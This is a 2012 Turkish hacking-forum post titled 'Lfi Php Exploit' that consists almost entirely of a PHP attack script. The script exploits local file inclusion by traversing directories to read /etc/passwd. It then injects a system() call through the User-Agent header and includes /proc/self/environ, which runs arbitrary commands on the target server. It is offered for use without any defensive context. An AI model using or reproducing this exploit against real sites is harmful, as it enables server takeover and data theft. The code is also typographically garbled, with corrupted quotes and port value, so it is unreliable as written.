İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Lfi Php Exploit

07-03-2012 23:14
#1
Alagros - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2011
Nereden:
EJAAD.
Mesajlar:
7.371
Teşekkür (Etti):
40
Teşekkür (Aldı):
747
Konular:
4356
Ticaret:
(0) %
[PHP]#!/usr/bin/php
//ambil variable
$com = str_replace(‘”‘,”,$_SERVER['argv'][1]); // hilangkan petik
$sub = explode(“[",$com); // pisah bug dengan command
$url = str_replace("http://","",$sub[0]); // url
$site= explode(“/”,$url,0); // sitename
$bug = str_replace($site.”/”,”",$url); // bug path
$cmd = substr($sub[1],0,(str_len($sub[1])-1)); // command

//dapatkan path direktori utama
$path = ‘/’;
while(!$mainpath){
$output = false;
$sock = fsockopen($site,”80***8243;,$errno,$errstr,15);
$get = “GET /”.$bug.$path”etc/passwd%00 HTTP/1.1\r\n”.
“Host: “.$site.”\r\n”.
“Accept: */*\r\n”.
“User-Agent: Mozilla/5.0\r\n”.
“Connection: Close\r\n\r\n”;
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600)).”\n”;
}
fclose($sock);
if(eregi(“root:”,$output)){
$mainpath = $path;
}
$path .= “../”;
}

// hentikan exploitasi jika tidak mendapatkan main direktori path
if(!$mainpath){
print “Failed!\r\n”; exit();
}

//injek environ
$output = false;
$sock = fsockopen($site,”80***8243;,$errno,$errstr,15);
$get = “GET /”.$bug.$mainpath”proc/self/environ%00 HTTP/1.1\r\n”.
“Host: “.$site.”\r\n”.
“Accept: */*\r\n”.
“User-Agent: Mozilla/5.0 ‘.system(‘”.$cmd.”‘).’[XCREW]‘;\r\n”.
“Connection: Close\r\n\r\n”;
fputs($sock,$get);
while (!feof($sock)) {
$output .= trim(fgets($sock, 3600)).”\n”;
}
fclose($sock);

//failed jika tidak bisa include environ/gagal
if(!eregi(“[XCREW]“,$output)){
print “Failed!\r\n”; exit();
}

//ambil output command
$result = explode(“[XCREW]“,$output);
$hasilcommand = $result[1];

print $hasilcommand.”\r\n”;
exit();
?>[/PHP]
Kullanıcı İmzası
DataMaN & _EroS_ & Ares & Alagros & Justice4ewer & MühüR


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı